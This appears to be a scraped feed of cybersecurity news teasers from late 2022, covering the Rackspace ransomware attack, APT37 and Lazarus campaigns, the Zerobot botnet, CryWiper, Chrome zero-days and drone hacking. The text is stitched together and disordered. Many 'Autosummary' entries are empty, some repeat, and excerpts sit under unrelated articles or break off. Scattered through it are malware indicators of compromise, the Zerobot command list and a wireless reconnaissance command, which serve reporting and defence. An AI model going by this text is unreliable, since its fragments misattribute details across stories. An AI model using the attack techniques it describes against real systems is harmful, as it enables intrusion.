With this offer, you get access to Uptycs" powerful security tools and features, including real-time visibility and control over your infrastructure, customizable queries and dashboards for tailored threat detection, and a scalable architecture for large and complex environments. This package includes advanced features like antivirus, anti-ransomware, web protection, and more. "Categories: News Categories: Ransomware Tags: Rackspace Tags: Exchange Tags: ransomware Tags: ProxyNotShell Rackspace said a ransomware incident affected its Hosted Exchange environment and caused service disruptions. |
The post Rackspace confirms it suffered a ransomware attack appeared first on Malwarebytes Labs.
"Autosummary:
Workaround Rackspace said it will help affected customers implement a temporary forwarding while the disruption is ongoing: “As a temporary solution while you set up Microsoft 365, it is possible to also implement a forwarding option that will allow mail destined for a Hosted Exchange user to be routed to an external email address. "Autosummary:
According to the researchers, yes there is: “Metaparasites, inadvertently, provide an intelligence boon to analysts, allowing us to gain unprecedented insights into sales, operations, negotiations, and identifiers which would otherwise remain hidden – as well as into marketplace culture, differing levels of operational security, and susceptibilities to deception and social engineering.” "Autosummary:
According to TAG, a zero-day vulnerability was embedded in the malicious documents by the APT37 hacking group (also known as ScarCruft, InkySquid, Reaper, and Ricochet Chollima). "Google warns that the North Korea-linked APT37 group is exploiting Internet Explorer zero-day flaw to spread malware. North Korea-linked APT37 group (aka ScarCruft, Reaper, and Group123) actively exploited an Internet Explorer zero-day vulnerability, tracked as CVE-2022-41128, in attacks aimed at South Korean users. Google Threat Analysis Group researchers discovered the zero-day vulnerability in late October 2022, it […]
The post APT37 used Internet Explorer Zero-Day in a recent campaign appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Zombinder is a third-party service on darknet used to embed malicious payloads in legitimate Android applications. While investigating a new malware campaign targeting Android and Windows systems, researchers at Threat Fabric discovered a darknet service, dubbed Zombinder, used to embed malicious payloads in legitimate Android apps. The campaign involved the Ermac Android banking Trojan along […]
The post Zombinder APK binding service used in multiple malware attacks appeared first on Security Affairs.
"Autosummary:
The Ermac variant employed in the attack has the following capabilities: Overlay attack to steal PII Keylogging Stealing e-mails from Gmail application Stealing 2FA codes Stealing seed phrases from several cryptocurrency wallets Experts also observed threat actors masquerading as malicious apps as browser updates. "Autosummary:
Royal ransomware submissions (ID Ransomware) Healthcare under attack The federal government has also warned about other ransomware operations known for actively targeting healthcare organizations across the U.S. For instance, last month, HHS warned of Venus ransomware impacting the country"s healthcare, with at least one entity known to have fallen victim to its attacks. "Autosummary:
"Autosummary:
"Despite fears of a looming recession, SMBs in the U.S. are spending more on software in 2023, according to Capterra’s 2023 SMB Software Buying Trends Survey. 75% of U.S. SMBs estimate they’ll spend more on software in 2023 compared to 2022. Alongside increased software budgets, Capterra’s survey of over 500 SMBs reveals four other major trends in software buying behaviors and challenges that will impact businesses in 2023: Fearful of cyberattacks, U.S. businesses rate security … More
The post Fear of cyberattacks drives SMBs to spend more on software appeared first on Help Net Security.
"Autosummary:
"Palo Alto Networks has released Medical IoT Security — the zero trust security solution for medical devices — enabling healthcare organizations to deploy and manage new connected technologies. Zero trust is a strategic approach to cybersecurity that secures an organization by eliminating implicit trust by continuously verifying every user and device. “The proliferation of connected medical devices in the healthcare industry brings a wealth of benefits, but these devices are often not well secured. For … More
The post Palo Alto Networks Medical IoT Security protects connected medical devices appeared first on Help Net Security.
"Autosummary:
Easily understand medical device vulnerabilities, patch status and security settings, and then get recommendations to bring devices into compliance with rules and guidelines, such as the Health Insurance Portability Accountability Act (HIPAA), General Data Protection Regulation (GDPR), and similar laws and regulations.For example, according to Unit 42, an alarming 75% of smart infusion pumps examined on the networks of hospitals and healthcare organizations had known security gaps,” said Anand Oswal, senior vice president of products, network security at Palo Alto Networks. "Autosummary:
"Autosummary:
On mobile, this is how the "Deal of the Year" list looks like: Twitter "Deal of the Year" list is a scam (BleepingComputer) As of today, the list has 155 members added by its admin (the threat actor), and these accounts when reviewed by BleepingComputer were seen following Elon Musk, Tesla, SpaceX and related organizations on Twitter. "Cybersecurity resilience is a top priority for companies as they look to defend against a rapidly evolving threat landscape, according to the latest edition of Cisco’s annual Security Outcomes Report. The survey findings are based on survey responses from over 4,700 participants across 26 countries, and pinpoint the top seven success factors that boost enterprise cybersecurity resilience, with a particular focus on cultural, environmental, and solution-based factors that businesses leverage to achieve security. The survey … More
The post Top 7 factors boosting enterprise cybersecurity resilience appeared first on Help Net Security.
"Autosummary:
The leading impacts cited include IT and communications interruption (62.6 percent), supply chain disruption (43 percent), impaired internal operations (41.4 percent) and lasting brand damage (39.7 percent). "Autosummary:
" In recent years, Telegram has not only witnessed widespread adoption in the cryptocurrency industry, but also been co-opted by threat actors looking to discuss zero-day vulnerabilities, offer stolen data, and market their services through the popular messaging platform. "Autosummary:
"Researchers discovered a new Go-based botnet called Zerobot that exploits two dozen security vulnerabilities IoT devices. Fortinet FortiGuard Labs researchers have discovered a new Go-based botnet called Zerobot that spreads by exploiting two dozen security vulnerabilities in the internet of things (IoT) devices and other applications. “This botnet, known as Zerobot, contains several modules, including self-replication, attacks for different protocols, […]
The post New Go-based botnet Zerobot exploits dozens of flaws appeared first on Security Affairs.
"Autosummary:
Zerobot targets multiple architectures, including i386, amd64, arm, arm64, mips, mips64, mips64le, mipsle, ppc64, ppc64le, riscv64, and s390x. "Autosummary:
The C2 may respond with one of the following commands: ping – Heartbeat, maintaining the connection – Heartbeat, maintaining the connection attack – Launch attack for different protocols: TCP, UDP, TLS, HTTP, ICMP – Launch attack for different protocols: TCP, UDP, TLS, HTTP, ICMP stop – Stop attack – Stop attack update – Install update and restart Zerobot – Install update and restart Zerobot enable_scan – Scan for open ports and start spreading itself via exploit or SSH/Telnet cracker – Scan for open ports and start spreading itself via exploit or SSH/Telnet cracker disable_scan – Disable scanning – Disable scanning command – Run OS command, cmd on Windows and bash on Linux – Run OS command, cmd on Windows and bash on Linux kill – Kill botnet program The malware also uses an "anti-kill" module designed to prevent terminating or killing its process. "Autosummary:
Threat actor claims to have access to CloudSEK"s network A threat actor named "sedut" is now trying to sell what they claim is access to CloudSek"s "networks, Xvigil, codebase, email, JIRA and social media accounts" on multiple hacking forums. "Autosummary:
"Autosummary:
On mobile, this is how the "Deal of the Year" list looks like: Twitter "Deal of the Year" list is a scam (BleepingComputer) As of today, the list has 155 members added by its admin (the threat actor), and these accounts when reviewed by BleepingComputer were seen following Elon Musk, Tesla, SpaceX and related organizations on Twitter. "Categories: Android Categories: Exploits and vulnerabilities Categories: News Google has issued its December round of patches, which includes a fix for a critical vulnerability that allows RCE over Bluetooth |
The post Update now! Google patches Android vulnerability that allows remote code execution over Bluetooth appeared first on Malwarebytes Labs.
"Autosummary:
Posted: December 7, 2022 by Google has issued its December round of patches, which includes a fix for a critical vulnerability that allows RCE over Bluetooth In the Android security bulletin of December 5, 2022 you can find an overview of the security vulnerabilities affecting Android devices that are fixed in patch level 2022-12-05 or later. "Categories: News Tags: FBI Tags: scams Tags: xmas Tags: christmas Tags: festive season Tags: social media Tags: cryptocurrency Tags: bitcoin Tags: app Tags: android Tags: fake job Tags: offer Tags: whatsapp Tags: telegram Tags: interview Tags: resume Tags: gift cards Tags: survey We take a look at a list of popular scams compiled by the FBI to avoid this festive season, and offer our own insights. |
The post Ho, ho, no! Scams to avoid this festive season appeared first on Malwarebytes Labs.
"Autosummary:
Smartphone app scams The FBI says: Some mobile apps, often disguised as games and offered for free, are designed to steal personal information. Charity scams The FBI says: Fraudulent charity scams, in which perpetrators set up false charities and profit from individuals who believe they are making donations to legitimate charitable organizations.Consumers should carefully research the job posting and individuals or company offering employment We say: Work from home scams are big business over the holiday season, especially with people potentially looking for a little extra cash in the run up to the new year. Check the number of installs, how long the file has been available, developer information, and the reviews. "Autosummary:
" Sandworm is a group of elite Russian hackers that have been active for at least two decades, previously linked to malicious campaigns leading to the Ukrainian blackouts of 2015 and 2016 [1, 2, 3], the KillDisk wiper attacks targeting Ukrainian banks, and the NotPetya ransomware. "In this Help Net Security video, Roman Faithfull, Cyber Intelligence Analyst at Digital Shadows, talks about how threat actors mobilize new members within the cybercriminal ecosystem. Cybercriminal forums are awash with users advertising and requesting the services of developers to design fresh new malware. Developers may be recruited to work in-house, with a monthly salary and other benefits, or they may be contracted ad hoc, with a one-time payment upon completion of commissioned work. Recruiters … More
The post Dark web recruiting techniques: Malware, phishing, and carding appeared first on Help Net Security.
"Autosummary:
"In August 2022, the United States and Mexico held the first dialogue between the two North American nations regarding the U.S.-Mexico Bicentennial Framework for Security, Public Health, and Safe Communities. Both countries met in August 2022 to advance their cooperation in cybersecurity and their commitment to an open, interoperable, secure, and reliable internet and stable cyberspace. Moreover, they hope to tighten their association through numerous initiatives, including sharing cyber threat information, which is fundamental at … More
The post Resecurity partners with Totalsec to increase its presence in the Mexican cybersecurity market appeared first on Help Net Security.
"Autosummary:
Echoing Yoo’s sentiments, Totalsec’s head of cybersecurity, Omar Garcia, and CEO, Francisco Sandoval, put forward: “The partnership with Resecurity brings industry- leading cyber threat intelligence to the Mexican market. "Autosummary:
"Google has patched CVE-2022-4262, a type confusion vulnerability in the V8 JavaScript engine used by Google Chrome (and Chromium), which is being exploited by attackers in the wild. No other technical details have been shared about this zero-day flaw, only that it was reported by security engineer Clement Lecigne of Google’s Threat Analysis Group (TAG), whose goal is to protect users from state-sponsored attacks and other advanced persistent threats. About CVE-2022-4262 With a “High” security … More
The post Google Chrome zero-day exploited in the wild (CVE-2022-4262) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
for each of the core functions: "Identify," "Protect," "Detect," "Respond," and "Recover": Identify Asset management is the process of knowing what all your organization"s critical assets are, where they"re located, who owns them, and who has access to them. Additional controls can maximize your ransomware readiness: having communication templates (to ensure the team knows what, how, and whom to contact during an incident), performing mandatory event analysis, and deploying Security Orchestration, Automation, and Response (SOAR) technology as either a separate product or a native part of an XDR solution.According to the Microsoft Defender Report 2022, following 98% of basic security hygiene such as Multi-Factor Authentication (MFA), applying zero-trust principles, keeping software updated, and using extended detection and response anti-malware still protects against 98% of attacks. "Researchers spotted a version of the open-source ransomware toolkit Cryptonite that doesn’t support decryption capabilities. Fortinet researchers discovered a sample of malware generated with the publicly available open-source ransomware toolkit Cryptonite that never offers the decryption window, turning it as a wiper. The experts also reported an increase in ransomware intentionally turned into wiper malware, these […]
The post Ransomware Toolkit Cryptonite turning into an accidental wiper appeared first on Security Affairs.
"Autosummary:
The encryption and decryption are not robust and the ransomware lack features like Windows Shadow Copy removal, File unlocking for a more thorough impact, Anti-analysis, and Defensive evasion (AMSI bypass, disabling event logging, etc.). "Autosummary:
" "As you know, on Friday, December 2nd, 2022, we became aware of suspicious activity and immediately took proactive measures to isolate the Hosted Exchange environment to contain the incident," the company said in an update to the initial incident report. "Autosummary:
The pro-Ukraine hacktivists have been very active in November, targeting over 900 Russian entities, including stores selling military equipment and drones, the Central Bank of Russia, the National Center for the Development of Artificial Intelligence, and Alfa Bank. "Autosummary:
Update the cached credentials of remote users to ensure the continuity of work Accessible from any web browser, the Windows login screen, or the uReset mobile application Verify identities with a choice of over 15 identity providers User enrollment enforcement and auto-enrollment options Password resets, while a necessity in some cases, are highly capable of self-service with a lessened impact on the helpdesk and an organization’s bottom line. According to a Yubico-sponsored report the average user spent 10.9 hours a year on password resets, leading to an average loss of $5.2 million a year in productivity for a 15,000-user organization (based on a $32-an-hour average).This is not uncommon, as many users wait until the last minute for a password change, leading to locked-out accounts and longer-than-expected password resets tickets. "Autosummary:
"In a Middle East region rife with surveillance threats for activists, it"s essential for digital security researchers to not only publish and promote findings, but also prioritize the protection of the region"s embattled activists, journalists, and civil society leaders," Ghattas said. "Russia’s second-largest bank VTB Bank reveals it is facing the largest DDoS (distributed denial of service) attack in its history. State-owned VTB Bank, the second-largest financial institution in Russia, says it is facing the largest DDoS (distributed denial of service) attack in its history. The pro-Ukraine collective IT Army of Ukraine has claimed responsibility for […]
The post Russia’s second-largest bank VTB Bank under DDoS attack appeared first on Security Affairs.
"Autosummary:
"Rackspace has finally confirmed the cause of the ongoing outage of its Hosted Exchange service: it’s ransomware. “As you know, on Friday, December 2nd, 2022, we became aware of suspicious activity and immediately took proactive measures to isolate the Hosted Exchange environment to contain the incident. We have since determined this suspicious activity was the result of a ransomware incident,” the company stated in the newest released service announcement. “Alongside our internal security team, we … More
The post Rackspace Hosted Exchange outage was caused by ransomware appeared first on Help Net Security.
"Autosummary:
The confirmation came just a few hours after the publication of a press release on the situation, in which Rackspace said the security incident “may result in a loss of revenue for the Hosted Exchange business, which generates approximately $30 million of annual revenue in the Apps & Cross Platform segment,” and that they expect to have “incremental costs associated with its response to the incident.” "Autosummary:
The disruption has affected services used by citizens, schools, daycare centers, and the police, which have been working intermittently today. "Autosummary:
"Categories: News Tags: VIN Tags: vehicle identification number Tags: car Tags: telematics Tags: SiriusXM Tags: data We take a look at reports of vehicle identification numbers being used to potentially reveal customer data through telematics. |
The post Vehicle Identification Numbers reveal driver data via telematics appeared first on Malwarebytes Labs.
"Autosummary:
Earlier this year, we were able to remotely unlock, start, locate, flash, and honk any remotely connected Honda, Nissan, Infiniti, and Acura vehicles, completely unauthorized, knowing only the VIN number of the car.Worse, using the VIN in this way was enough to pull up the customer’s name, phone number, address, and car details.Can you imagine anyone doing this now, as opposed to using business addresses, PO boxes, or domain privacy services in the age of trolling, doxxing, and swatting? Here"s how we found it, and how it works: pic.twitter.com/ul3A4sT47k — Sam Curry (@samwcyo) November 30, 2022 As with so many interesting system exploits, the weak spot is a service being made use of by many. "Cybercriminals use a variety of tactics all at once and are constantly innovating. Organizations need to do the same and take a multidimensional approach to cybersecurity because biannual training videos aren’t enough to engage employees or protect your business. Is your cybersecurity strategy disengaging employees? A bad actor stole $540 million from an NFT gaming company in July, an attack that started with a fake job offer on LinkedIn. In cases like these, social engineering … More
The post Engage your employees with better cybersecurity training appeared first on Help Net Security.
"Autosummary:
2. Create clear and specific cybersecurity policies When organizations draft their cybersecurity policies, they often apply a one-size-fits-all approach. When providing training related to social engineering or other types of attacks, strike a balance between communicating the very real consequences of cyber-attacks and more positive messaging, like best practices and cyber hygiene routines. Social engineering attacks can present as emails from (what appear to be) friends, asking you for credit card information, or they can be hyper-personal attacks in which fraudsters clone family members’ social media accounts and use personal photos and location information to convince you they’re real. "Autosummary:
"The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware. Volexity researchers warn of a new malware campaign conducted by the North Korea-linked Lazarus APT against cryptocurrency users. The threat actors were observed spreading fake cryptocurrency apps under the fake brand BloxHolder to deliver the AppleJeus […]
The post Lazarus APT uses fake cryptocurrency apps to spread AppleJeus Malware appeared first on Security Affairs.
"Autosummary:
“While the file was no longer available at the time of analysis, based on public sandbox results for the file in question, the downloaded payload, “Background.png”, embeds the following three files: “Logagent.exe” – a legitimate file (md5: eb1e19613a6a260ddd0ae9224178355b) “wsock32.dll” – a side-loaded library internally named HijackingLib.dll (md5: e66bc1e91f1a214d098cf44ddb1ae91a) “56762eb9-411c-4842-9530-9922c46ba2da” – an encoded payload decoded by “wsock32.dll” “continues the analysis. "Autosummary:
"Autosummary:
"Autosummary:
"Resecurity has identified a new underground marketplace in the Dark Web oriented towards mobile malware developers and operators. “In the Box” dark web marketplace is leveraged by cybercriminals to attack over 300 financial institutions (FIs), payment systems, social media and online-retailers in 43 countries Resecurity, the California-based cybersecurity company protecting major Fortune 500 companies, has identified a new underground marketplace in […]
The post Exclusive: The largest mobile malware marketplace identified by Resecurity in the Dark Web appeared first on Security Affairs.
"Autosummary:
Currently, cybercriminals are offering over 1,849 malicious scenarios for sale, designed for major financial institutions, ecommerce, payment systems, online retailers, and social media companies from over 45 countries including the U.S, the U.K, Canada, Brazil, Colombia, Mexico, Saudi Arabia, Bahrain, Turkey, and Singapore. The operators behind “IntheBox” marketplace are closely connected to developers of major mobile malware families including Alien, Cerberus, Ermac, Hydra, Octopus (aka “Octo”), Poison, and MetaDroid. "A critical stack-based buffer overflow bug, tracked as CVE-2022-23093, in the ping service can allow to take over FreeBSD systems. The maintainers of the FreeBSD operating system released updates to address a critical flaw, tracked as CVE-2022-23093, in the ping module that could be potentially exploited to gain remote code execution. The ping utility allows testing the […]
The post Critical Ping bug potentially allows remote hack of FreeBSD systems appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"A French hospital near Paris canceled operations and transfer some patients due to a cyber attack suffered over the weekend. France’s health ministry announced that the Hospital Centre of Versailles was hit by a cyber attack over the weekend. Hospital Centre of Versailles, which includes Andre-Mignot Hospital, Richaud Hospital and the Despagne Retirement Home, canceled […]
The post French hospital cancels operations after a ransomware attack appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
J"irai ce midi témoigner du soutien du gouvernement aux équipes mobilisées pour assurer la prise en charge des patients.@FrcsBraun — Jean-Noël Barrot (@jnbarrot) December 4, 2022 Jean-Noël Barrot, the Minister Delegate in charge of Digital Transition and Telecommunications, said the hospital immediately isolated the infected systems to limit the spread of the malware to additional devices and alerted the French National Authority for Security and Defense of Information Systems (ANSSI). "Biometrics is supposed to be one of the underpinnings of a modern authentication system. But many biometric implementations (whether that be fingerprint scanes or face recognition) can be wildly inaccurate, and the only universally positive thing to say about them is they"re better than nothing.
Also — and this may prove critical — the fact that biometrics are falsely seen as being very accurate may be sufficient to dissuade some fraud attempts.
There are a variety of practical reasons biometrics don"t work well in the real world, and a recent post by a cybersecurity specialist at KnowBe4, a security awareness training vendor, adds a new layer of complexity to the biometrics issue.
Autosummary:
On top of that, many vendors, including Apple (iOS) and Google (Android), make marketing choices in their settings, where they choose how stringent or lenient the authentication is. There are a variety of practical reasons biometrics don"t work well in the real world, and a recent post by a cybersecurity specialist at KnowBe4, a security awareness training vendor, adds a new layer of complexity to the biometrics issue. "So far, none of the submitted candidates come anywhere close,” Grimes wrote, summarizing the NIST findings. In other words, if a thief wants to get around biometrics, all he or she has to do is fail once or twice and then deal with the easier-to-crack PIN. "Autosummary:
"Autosummary:
"Categories: News Categories: Threats Tags: Lazarus Tags: APT38 Tags: AppleJeus Tags: sideloading Tags: BloxHolder Researchers have found a new Lazarus campaign, once again targeting cryptocurrency users and organizations by deploying a fake website and malicious documents. |
The post Lazarus group uses fake cryptocurrency apps to plant AppleJeus malware appeared first on Malwarebytes Labs.
"Autosummary:
IOCs Users that installed the BloxHolder msi may also find the application in their list of installed programs: Domains: strainservice[.]com bloxholder[.]com rebelthumb[.]net wirexpro[.]com oilycargo[.]com telloo[.]io BloxHolder[.]com Files: %APPDATA%\Roaming\Bloxholder\CameraSettingsUIHost.exe %APPDATA%\Roaming\Bloxholder\DUser.dll %APPDATA%\Roaming\Bloxholder\18e190413af045db88dfbd29609eb877 BloxHolder_v1.2.5.msi Scheduled Task: %SYSDIR%\Tasks\Bloxholder* We don’t just report on threats—we remove them Cybersecurity risks should never spread beyond a headline. AppleJeus Since 2018, one of Lazarus Group"s tactics has been to disguise AppleJeus malware as cryptocurrency trading platforms for both Windows and Mac. "Categories: Exploits and vulnerabilities Categories: News Tags: V8 Tags: V8 JavaScript Engine Tags: Google Chrome Tags: Chrome Tags: CVE-2022-4262 Tags: 108.0.5359.94 Tags: 108.0.5359.95 Tags: Chrome V8 flaw Tags: type confusion Google has rolled out an out-of-band patch for an actively exploited zero-day vulnerability in its V8 JavaScript engine. Make sure you"re using the latest version. |
The post Update now! Emergency fix for Google Chrome"s V8 JavaScript engine zero-day flaw released appeared first on Malwarebytes Labs.
"Autosummary:
On Friday, December 2, Google rolled out an out-of-band patch for an actively exploited zero-day vulnerability in its V8 JavaScript engine. "Sherweb has announced the addition of Malwarebytes to its cloud solutions portfolio. Malwarebytes provides advanced endpoint protection in an evolving threat landscape. It can be used to provide protection on its own or combined with other solutions to create a layered defense. Studies have shown that Malwarebytes found and removed hidden threats on 39% of devices with another antivirus installed, making it the clear choice for MSPs who want to offer their clients the most … More
The post Sherweb partners with Malwarebytes to offer endpoint security for MSPs appeared first on Help Net Security.
"Autosummary:
"Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts. Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts. The malware masquerades as ransomware, but the analysis of the code demonstrates that it […]
The post New CryWiper wiper targets Russian entities masquerading as a ransomware appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Qualys researchers demonstrated how to chain a new Linux flaw with two other two issues to gain full root privileges on an impacted system. Researchers at the Qualys’ Threat Research Unit demonstrated how to chain a new Linux vulnerability, tracked as CVE-2022-3328, with two other flaws to gain full root privileges on an affected system. The […]
The post A new Linux flaw can be chained with other two bugs to gain full root privileges appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Phylum has added Automated Vulnerability Reachability to its software supply chain security platform capabilities. With the ability to focus only on fixing what matters, security pros can end the deluge of false positives and developers can innovate with greater speed and confidence. This new introduction, combined with Phylum’s ability to block and prioritize open-source code risks, provides organizations with the comprehensive software supply chain security. Vulnerabilities represent a clear and present danger to the integrity … More
The post Phylum Automated Vulnerability Reachability strengthens software supply chain security appeared first on Help Net Security.
"Autosummary:
This new introduction, combined with Phylum’s ability to block and prioritize open-source code risks, provides organizations with the comprehensive software supply chain security. "Autosummary:
"Google released security updates to address a new Chrome zero-day flaw, tracked as CVE-2022-4262, actively exploited in the wild. Google rolled out an emergency security update for the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4262, that is actively exploited. The CVE-2022-4262 vulnerability is a type confusion bug in the V8 […]
The post Google fixed the ninth actively exploited Chrome zeroday this year appeared first on Security Affairs.
"Autosummary:
CVE-2022-2856 (August 17) – Insufficient validation of untrusted input in Intents CVE-2022-2294 (July 4) – Heap buffer overflow in the Web Real-Time Communications (WebRTC) component CVE-2022-1364 (April 14) – type confusion issue that resides in the V8 JavaScript engine CVE-2022-1096 – (March 25) – type Confusion in V8 JavaScript engine CVE-2022-0609 – (February 14) – use after free issue that resides in the Animation component. "Autosummary:
However, based on the results, even though Google said that "all affected parties were informed of the findings and have taken remediation measures to minimize the user impact," it looks like not all the vendors have followed Google"s recommendations since, at least in Samsung"s case, the leaked platform certificates are still being used to digitally sign apps. "Netwrix announced additional findings for the financial and banking sector from its global 2022 Cloud Security Report. Compared to other industries surveyed, financial institutions are much more concerned about users who have legitimate access to their cloud infrastructure. Indeed, 44 percent of respondents in this sector say their own IT staff poses the biggest risk to data security in the cloud and 47 percent worry about contractors and partners, compared to 30 percent and 36 … More
The post Financial organizations more prone to accidental data leakage appeared first on Help Net Security.
"Autosummary:
"Autosummary:
However, based on the results, even though Google said that "all affected parties were informed of the findings and have taken remediation measures to minimize the user impact," it looks like not all the vendors have followed Google"s recommendations since, at least in Samsung"s case, the leaked platform certificates are still being used to digitally sign apps. "Autosummary:
"Australian health insurance provider Medibank has confirmed that another batch of the customer data stolen in the recent breach has been leaked. “We are conducting further analysis on the files today and at this stage believe there are 6 zipped files in a folder called ‘full’ containing the raw data that we believed the criminal stole,” the company said. They previously confirmed that data of 9.7 million of its current and former customers was stolen. … More
The post All of Medibank’s stolen data leaked, Australia increases maximum penalties for data breaches appeared first on Help Net Security.
"Autosummary:
There’s no doubt that, given the sensitive nature of the compromised and leaked data, the support program they set up is very comprehensive, offering free identity monitoring services, counseling and resources for mental health support, hardship support, and so on. "Autosummary:
Block user names, display names, specific words, consecutive characters, incremental passwords, and the reuse of a part of the current password. With the Specops Authentication Client, upon password changes, instantly inform your users as to why their password won"t work, even more so if the password has been stolen through a sophisticated phishing scam. These include settings such as whether to enable the feature, whether or not to notify a user of a malicious website, whether a password has been reused, or if an unsafe application has been detected. "Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022. The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million U.S. Dollars (USD) and received more than $60 million in ransom payments from over 100 victims worldwide […]
The post Cuba Ransomware received over $60M in Ransom payments as of August 2022 appeared first on Security Affairs.
"Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory that provides technical details about the gang’s operations, including tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Cuba ransomware. "Autosummary:
The Lapsus$ hacker group made the news earlier this year after hacking Microsoft, Nvidia, T-Mobile, Samsung, Uber, Vodafone, Ubisoft, Okta, and e-commerce giant Mercado Libre. "Autosummary:
Finally, the wiper will corrupt all enumerated files except for ".exe", ".dll", "lnk", ".sys", ".msi", and its own ".CRY", while also skipping System, Windows, and Boot directories to prevent rendering the computer completely unusable. "Autosummary:
Search com.android.power com.management.propaganda com.sec.android.musicplayer com.houla.quicken com.attd.da com.arlo.fappx com.metasploit.stage com.vantage.ectronic.cornmuni That said, it"s not immediately clear how and where these artifacts were found, and if they were used as part of any active malware campaign. "Autosummary:
"Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @LawrenceAbrams, @FourOctets, @demonslay335, @struppigel, @PolarToffee, @serghei, @fwosar, @DanielGallagher, @jorntvdw, @billtoulas, @Seifreed, @VK_Intel, @malwareforme, @malwrhunterteam, @Ionut_Ilascu, @kaspersky, @xfalexx,@hyperconectado, @kennethdee, @pcrisk, @pushecx, and @BrettCallow. "Autosummary:
"Threat actors could exploit drones for payload delivery, kinetic operations, and even diversion, experts warn. Original post at hxxps://cybernews.com/security/drones-hack-airborne-cybersecurity-nightmare/ Once a niche technology, drones are about to explode in terms of market growth and enterprise adoption. Naturally, threat actors follow the trend and exploit the technology for surveillance, payload delivery, kinetic operations, and even diversion. […]
The post <strong>Attack of drones: airborne cybersecurity nightmare</strong> appeared first on Security Affairs.
"Autosummary:
This article is going to explore cybersecurity considerations surrounding drone platforms through an initial review of drone market trends, popular drone hacking tools, and general drone hacking techniques that may be used to compromise enterprise drone platforms, including how drone platforms themselves may be used as malicious hacking platforms.Common attacks against enterprise drones include platform takeover, where an attacker uses RF, Wi-Fi or a subscription service like Aerial Armor to detect flight paths of a drone in a geographical area, perform de-authentication attacks, take over control of the drone and land the stolen drone in a location of its choosing.Using the monitored interface from the Dronesploit example, aspects of Aircrack-ng can be used to perform several useful drone security tests, including identification of wireless drone networks, de-authentication of connected devices like a drone controller, or cracking of the WEP/WPA keys.Further considerations must be taken to secure onboard storage of the drone, ensure routes drones travel are relatively safe (i.e., free from obstacles, sparsely populated, etc.) and that Wi-Fi or Radio Frequency (RF) signals used by drone platforms are properly encrypted against eavesdropping or manipulation. The below example shows how the “Airodump-ng wlan0” command is useful for identifying nearby drone wi-fi signals, including the MAC address of the broadcasting device, the network encryption scheme, and the wireless authentication standard used by the drone. "Categories: News Tags: CVE Tags: android Tags: apps Tags: abandonware Tags: vulnerability Tags: bug Tags: telepad Tags: pc keyboard Tags: lazy mouse Three abandoned Android apps with remote code execution vulnerabilities need to be shown the door. |
The post Time to uninstall! Abandoned Android apps pack a vulnerability punch appeared first on Malwarebytes Labs.
"Autosummary:
Telepad versions 1.0.7 and prior Lazy Mouse versions 2.0.1 and prior PC Keyboard versions 30 and prior The three apps are reported to be abandonware, which makes it even more essential to get word out with regard to the security issues at hand. The other three are CVE-2022-45478, CVE-2022-45480, and CVE-2022-45483 respectively, which all involve machine-in-the-middle attacks and reading all keypresses in cleartext. "Categories: News Categories: Ransomware Tags: Cuba ransomware Tags: ransomware Tags: double extortion Tags: Cybersecurity Advisory Tags: CSA Tags: CISA Tags: FBI Cuba ransomware is spotlighted in a recent cybersecurity advisory (CSA) in the ongoing #StopRansomware campaign spearheaded by CISA and the FBI. |
The post CISA and the FBI issue alert about Cuba ransomware appeared first on Malwarebytes Labs.
"Autosummary:
Like other ransomware groups, its threat actors use double extortion tactics, predominantly targeting organizations in the US in five critical infrastructure sectors: critical manufacturing, financial services, government facilities, healthcare and public health, and information technology.Various IOCs (associated files, email addresses, a Jabber address, IP addresses, Bitcoin wallets, and ransom notes) and MITRE ATT&CK techniques are also found on that page. "When the Federal Trade Commission (FTC) releases new regulations or changes to existing ones, the implications may not be obvious to the average business or company employees. The FTC and privacy The FTC is a federal agency that protects consumers from fraudulent, deceptive, and unfair business practices. The Commission, often in collaboration with other regulatory agencies such as the United States Department of Justice and Attorney General, has enforcement authority and other responsibilities under more … More
The post Cybersecurity engineering under the Federal Trade Commission appeared first on Help Net Security.
"Autosummary:
To accomplish the safeguard rule: 1. Design an information security program containing “administrative, technical, and physical safeguards” to protect the security, confidentiality, and integrity of customer personal information, including both electronic and paper records. The FTC has used its authority to promulgate specific privacy-focused rules, including the Health Breach Notification Rule (HBN Rule), the Standards for Safeguarding Customer Information under the Gramm-Leach-Bliley Act (Safeguards Rule), the Children’s Online Privacy Protection Act (COPPA) and the Fair Credit Reporting Act. 4. Provide customers with clear and conspicuous privacy notices that include information collected, with whom it may be shared, how information is protected, and an explanation of the opt-out policy. "Autosummary:
"Autosummary:
"Autosummary:
Below is a list of some of the data and applications the info-stealing component targets: Hardware and software information Files stored in local disks Account credentials and cookies stored in web browsers Thunderbird and Outlook emails Discord, Telegram, Signal, and Skype messaging data NordVPN, ProtonVPN, OpenVPN,and CrypticVPN account data FileZilla and TotalCommander data Steam, Minecraft, Battle. "Autosummary:
